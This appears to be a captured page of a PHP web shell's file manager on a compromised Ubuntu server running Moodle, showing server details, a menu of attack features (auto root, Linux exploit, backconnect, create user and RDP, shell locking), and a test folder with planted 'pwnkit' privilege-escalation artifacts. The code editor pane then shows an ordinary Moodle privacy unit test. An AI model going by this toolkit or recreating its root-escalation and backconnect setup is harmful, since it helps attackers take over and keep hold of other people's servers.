Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
user /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
behat
[ DIR ]
drwxrwxr-x
fixtures
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
editlib_test.php
5.31
KB
-rw-rw-r--
externallib_test.php
54.1
KB
-rw-rw-r--
myprofile_test.php
15.99
KB
-rw-rw-r--
privacy_test.php
15.03
KB
-rw-rw-r--
profilelib_test.php
9.06
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
search_test.php
10.76
KB
-rw-rw-r--
userlib_test.php
40.93
KB
-rw-rw-r--
userroleseditable_test.php
3.13
KB
-rw-rw-r--
userselector_test.php
10.65
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : privacy_test.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Privacy tests for core_user. * * @package core_user * @category test * @copyright 2018 Adrian Greeve <adrian@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); global $CFG; use \core_privacy\tests\provider_testcase; require_once($CFG->dirroot . "/user/lib.php"); /** * Unit tests for core_user. * * @copyright 2018 Adrian Greeve <adrian@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class core_user_privacy_testcase extends provider_testcase { /** * Check that context information is returned correctly. */ public function test_get_contexts_for_userid() { $this->resetAfterTest(); $user = $this->getDataGenerator()->create_user(); // Create some other users as well. $user2 = $this->getDataGenerator()->create_user(); $user3 = $this->getDataGenerator()->create_user(); $context = context_user::instance($user->id); $contextlist = \core_user\privacy\provider::get_contexts_for_userid($user->id); $this->assertSame($context, $contextlist->current()); } /** * Test that data is exported as expected for a user. */ public function test_export_user_data() { $this->resetAfterTest(); $user = $this->getDataGenerator()->create_user(); $course = $this->getDataGenerator()->create_course(); $context = \context_user::instance($user->id); $this->create_data_for_user($user, $course); $approvedlist = new \core_privacy\local\request\approved_contextlist($user, 'core_user', [$context->id]); $writer = \core_privacy\local\request\writer::with_context($context); \core_user\privacy\provider::export_user_data($approvedlist); // Make sure that the password history only returns a count. $history = $writer->get_data([get_string('privacy:passwordhistorypath', 'user')]); $objectcount = new ArrayObject($history); // This object should only have one property. $this->assertCount(1, $objectcount); $this->assertEquals(1, $history->password_history_count); // Password resets should have two fields - timerequested and timererequested. $resetarray = (array) $writer->get_data([get_string('privacy:passwordresetpath', 'user')]); $detail = array_shift($resetarray); $this->assertTrue(array_key_exists('timerequested', $detail)); $this->assertTrue(array_key_exists('timererequested', $detail)); // Last access to course. $lastcourseaccess = (array) $writer->get_data([get_string('privacy:lastaccesspath', 'user')]); $entry = array_shift($lastcourseaccess); $this->assertEquals($course->fullname, $entry['course_name']); $this->assertTrue(array_key_exists('timeaccess', $entry)); // User devices. $userdevices = (array) $writer->get_data([get_string('privacy:devicespath', 'user')]); $entry = array_shift($userdevices); $this->assertEquals('com.moodle.moodlemobile', $entry['appid']); // Make sure these fields are not exported. $this->assertFalse(array_key_exists('pushid', $entry)); $this->assertFalse(array_key_exists('uuid', $entry)); // Session data. $sessiondata = (array) $writer->get_data([get_string('privacy:sessionpath', 'user')]); $entry = array_shift($sessiondata); // Make sure that the sid is not exported. $this->assertFalse(array_key_exists('sid', $entry)); // Check that some of the other fields are present. $this->assertTrue(array_key_exists('state', $entry)); $this->assertTrue(array_key_exists('sessdata', $entry)); $this->assertTrue(array_key_exists('timecreated', $entry)); // Course requests $courserequestdata = (array) $writer->get_data([get_string('privacy:courserequestpath', 'user')]); $entry = array_shift($courserequestdata); // Make sure that the password is not exported. $this->assertFalse(array_key_exists('password', $entry)); // Check that some of the other fields are present. $this->assertTrue(array_key_exists('fullname', $entry)); $this->assertTrue(array_key_exists('shortname', $entry)); $this->assertTrue(array_key_exists('summary', $entry)); // User details. $userdata = (array) $writer->get_data([]); // Check that the password is not exported. $this->assertFalse(array_key_exists('password', $userdata)); // Check that some critical fields exist. $this->assertTrue(array_key_exists('firstname', $userdata)); $this->assertTrue(array_key_exists('lastname', $userdata)); $this->assertTrue(array_key_exists('email', $userdata)); } /** * Test that user data is deleted for one user. */ public function test_delete_data_for_all_users_in_context() { global $DB; $this->resetAfterTest(); $user = $this->getDataGenerator()->create_user([ 'idnumber' => 'A0023', 'emailstop' => 1, 'icq' => 'aksdjf98', 'phone1' => '555 3257', 'institution' => 'test', 'department' => 'Science', 'city' => 'Perth', 'country' => 'au' ]); $user2 = $this->getDataGenerator()->create_user(); $course = $this->getDataGenerator()->create_course(); $this->create_data_for_user($user, $course); $this->create_data_for_user($user2, $course); \core_user\privacy\provider::delete_data_for_all_users_in_context(context_user::instance($user->id)); // These tables should not have any user data for $user. Only for $user2. $records = $DB->get_records('user_password_history'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); $records = $DB->get_records('user_password_resets'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); $records = $DB->get_records('user_lastaccess'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); $records = $DB->get_records('user_devices'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); // Now check that there is still a record for the deleted user, but that non-critical information is removed. $record = $DB->get_record('user', ['id' => $user->id]); $this->assertEmpty($record->idnumber); $this->assertEmpty($record->emailstop); $this->assertEmpty($record->icq); $this->assertEmpty($record->phone1); $this->assertEmpty($record->institution); $this->assertEmpty($record->department); $this->assertEmpty($record->city); $this->assertEmpty($record->country); $this->assertEmpty($record->timezone); $this->assertEmpty($record->timecreated); $this->assertEmpty($record->timemodified); $this->assertEmpty($record->firstnamephonetic); // Check for critical fields. // Deleted should now be 1. $this->assertEquals(1, $record->deleted); $this->assertEquals($user->id, $record->id); $this->assertEquals($user->username, $record->username); $this->assertEquals($user->password, $record->password); $this->assertEquals($user->firstname, $record->firstname); $this->assertEquals($user->lastname, $record->lastname); $this->assertEquals($user->email, $record->email); } /** * Test that user data is deleted for one user. */ public function test_delete_data_for_user() { global $DB; $this->resetAfterTest(); $user = $this->getDataGenerator()->create_user([ 'idnumber' => 'A0023', 'emailstop' => 1, 'icq' => 'aksdjf98', 'phone1' => '555 3257', 'institution' => 'test', 'department' => 'Science', 'city' => 'Perth', 'country' => 'au' ]); $user2 = $this->getDataGenerator()->create_user(); $course = $this->getDataGenerator()->create_course(); $this->create_data_for_user($user, $course); $this->create_data_for_user($user2, $course); // Provide multiple different context to check that only the correct user is deleted. $contexts = [context_user::instance($user->id)->id, context_user::instance($user2->id)->id, context_system::instance()->id]; $approvedlist = new \core_privacy\local\request\approved_contextlist($user, 'core_user', $contexts); \core_user\privacy\provider::delete_data_for_user($approvedlist); // These tables should not have any user data for $user. Only for $user2. $records = $DB->get_records('user_password_history'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); $records = $DB->get_records('user_password_resets'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); $records = $DB->get_records('user_lastaccess'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); $records = $DB->get_records('user_devices'); $this->assertCount(1, $records); $data = array_shift($records); $this->assertNotEquals($user->id, $data->userid); $this->assertEquals($user2->id, $data->userid); // Now check that there is still a record for the deleted user, but that non-critical information is removed. $record = $DB->get_record('user', ['id' => $user->id]); $this->assertEmpty($record->idnumber); $this->assertEmpty($record->emailstop); $this->assertEmpty($record->icq); $this->assertEmpty($record->phone1); $this->assertEmpty($record->institution); $this->assertEmpty($record->department); $this->assertEmpty($record->city); $this->assertEmpty($record->country); $this->assertEmpty($record->timezone); $this->assertEmpty($record->timecreated); $this->assertEmpty($record->timemodified); $this->assertEmpty($record->firstnamephonetic); // Check for critical fields. // Deleted should now be 1. $this->assertEquals(1, $record->deleted); $this->assertEquals($user->id, $record->id); $this->assertEquals($user->username, $record->username); $this->assertEquals($user->password, $record->password); $this->assertEquals($user->firstname, $record->firstname); $this->assertEquals($user->lastname, $record->lastname); $this->assertEquals($user->email, $record->email); } /** * Create user data for a user. * * @param stdClass $user A user object. * @param stdClass $course A course. */ protected function create_data_for_user($user, $course) { global $DB; $this->resetAfterTest(); // Last course access. $lastaccess = (object) [ 'userid' => $user->id, 'courseid' => $course->id, 'timeaccess' => time() - DAYSECS ]; $DB->insert_record('user_lastaccess', $lastaccess); // Password history. $history = (object) [ 'userid' => $user->id, 'hash' => 'HID098djJUU', 'timecreated' => time() ]; $DB->insert_record('user_password_history', $history); // Password resets. $passwordreset = (object) [ 'userid' => $user->id, 'timerequested' => time(), 'timererequested' => time(), 'token' => $this->generate_random_string() ]; $DB->insert_record('user_password_resets', $passwordreset); // User mobile devices. $userdevices = (object) [ 'userid' => $user->id, 'appid' => 'com.moodle.moodlemobile', 'name' => 'occam', 'model' => 'Nexus 4', 'platform' => 'Android', 'version' => '4.2.2', 'pushid' => 'kishUhd', 'uuid' => 'KIhud7s', 'timecreated' => time(), 'timemodified' => time() ]; $DB->insert_record('user_devices', $userdevices); // Course request. $courserequest = (object) [ 'fullname' => 'Test Course', 'shortname' => 'TC', 'summary' => 'Summary of course', 'summaryformat' => 1, 'category' => 1, 'reason' => 'Because it would be nice.', 'requester' => $user->id, 'password' => '' ]; $DB->insert_record('course_request', $courserequest); // User session table data. $usersessions = (object) [ 'state' => 0, 'sid' => $this->generate_random_string(), // Needs a unique id. 'userid' => $user->id, 'sessdata' => 'Nothing', 'timecreated' => time(), 'timemodified' => time(), 'firstip' => '0.0.0.0', 'lastip' => '0.0.0.0' ]; $DB->insert_record('sessions', $usersessions); } /** * Create a random string. * * @param integer $length length of the string to generate. * @return string A random string. */ protected function generate_random_string($length = 6) { $response = ''; $source = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; if ($length > 0) { $response = ''; $source = str_split($source, 1); for ($i = 1; $i <= $length; $i++) { $num = mt_rand(1, count($source)); $response .= $source[$num - 1]; } } return $response; } }
Close
